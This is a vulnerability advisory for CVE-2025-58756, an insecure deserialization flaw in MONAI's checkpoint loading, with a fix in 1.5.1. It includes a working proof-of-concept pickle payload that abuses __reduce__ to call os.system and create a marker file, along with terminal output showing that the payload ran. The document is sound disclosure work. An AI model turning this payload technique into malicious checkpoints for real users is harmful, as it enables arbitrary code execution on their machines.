CVE-2025-58756

Summary

In model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True) in monai/bundle/scripts.py , weights_only=True is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.

This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.

Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.

The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.


import os  
import tempfile  
import json  
import torch  
from pathlib import Path  
  
class MaliciousPayload:  
    def __reduce__(self):  
        return (os.system, (&#039;touch /tmp/hacker2.txt&#039;,))  
  
def test_checkpoint_loader_attack():  

      

    temp_dir = Path(tempfile.mkdtemp())  
    checkpoint_file = temp_dir / &quot;malicious_checkpoint.pt&quot;  
      

    malicious_checkpoint = {  
        &#039;model_state_dict&#039;: MaliciousPayload(),  
        &#039;optimizer_state_dict&#039;: {},  
        &#039;epoch&#039;: 100  
    }  
      

    torch.save(malicious_checkpoint, checkpoint_file)  
      
     
    from monai.handlers import CheckpointLoader  
    import torch.nn as nn  
          
 
    model = nn.Linear(10, 1)  
        
    loader = CheckpointLoader(  
        load_path=str(checkpoint_file),  
        load_dict={&quot;model&quot;: model}  
    )  
          
    class MockEngine:  
        def __init__(self):  
            self.state = type(&#039;State&#039;, (), {})()  
            self.state.max_epochs = None  
            self.state.epoch = 0  
          
    engine = MockEngine()  
    loader(engine)  
          
          
    proof_file = &quot;/tmp/hacker2.txt&quot;  
    if os.path.exists(proof_file):  
        print(&quot;Succes&quot;)  
        #os.remove(proof_file)  
        return True  
    else:  
        print(&quot;False&quot;)  
        return False  
  
if __name__ == &quot;__main__&quot;:   
    success = test_checkpoint_loader_attack()

Because my test environment is missing some content, an error will be reported during operation, but the operation is still executed.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  checkpoint_pwned.txt  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid  tmpgjp8145d  tmpi3_u3wn8  tmpjvuhwif6  tmpkocoo34q  tmpp3q8occa
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python p2.py 
Traceback (most recent call last):
  File &quot;/root/autodl-tmp/mmm/p2.py&quot;, line 61, in &lt;module&gt;
    success = test_checkpoint_loader_attack()  
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File &quot;/root/autodl-tmp/mmm/p2.py&quot;, line 48, in test_checkpoint_loader_attack
    loader(engine)  
    ^^^^^^^^^^^^^^
  File &quot;/root/miniconda3/lib/python3.12/site-packages/monai/handlers/checkpoint_loader.py&quot;, line 146, in __call__
    Checkpoint.load_objects(to_load=self.load_dict, checkpoint=checkpoint, strict=self.strict)
  File &quot;/root/miniconda3/lib/python3.12/site-packages/ignite/handlers/checkpoint.py&quot;, line 624, in load_objects
    _tree_apply2(_load_object, to_load, checkpoint_obj)
  File &quot;/root/miniconda3/lib/python3.12/site-packages/ignite/utils.py&quot;, line 209, in _tree_apply2
    _tree_apply2(func, _CollectionItem.wrap(x, k, v), y[k])
  File &quot;/root/miniconda3/lib/python3.12/site-packages/ignite/utils.py&quot;, line 216, in _tree_apply2
    return func(x, y)
           ^^^^^^^^^^
  File &quot;/root/miniconda3/lib/python3.12/site-packages/ignite/handlers/checkpoint.py&quot;, line 613, in _load_object
    obj.load_state_dict(chkpt_obj, **kwargs)
  File &quot;/root/miniconda3/lib/python3.12/site-packages/torch/nn/modules/module.py&quot;, line 2581, in load_state_dict
    raise RuntimeError(
RuntimeError: Error(s) in loading state_dict for Linear:
        Missing key(s) in state_dict: &quot;weight&quot;, &quot;bias&quot;. 
        Unexpected key(s) in state_dict: &quot;model_state_dict&quot;, &quot;optimizer_state_dict&quot;, &quot;epoch&quot;. 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  checkpoint_pwned.txt  hacker1.txt  hacker2.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid  tmpgjp8145d  tmpi02txakb  tmpi3_u3wn8  tmpjvuhwif6  tmpkocoo34q  tmpp3q8occa

Impact

Leading to arbitrary command execution

Fix suggestion

Use a safe method to load, or force weights_only=True

Published: Sep 9, 2025
Updated: Sep 10, 2025
CVE: CVE-2025-58756
GHSA: GHSA-6vm5-6jv9-rjpj
Severity: High
Exploit:

CVSS v3:

Severity: Unknown
Score:
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWEs:

CWE-502

OWASP TOP 10:

A8 - Insecure Deserialization

Affected Software
References

Software	From	Fixed in
monai	-	1.5.1

Vulnerability Database

CVE-2025-58756

Summary

Impact

Fix suggestion

Deep Security Visibility Without the Complexity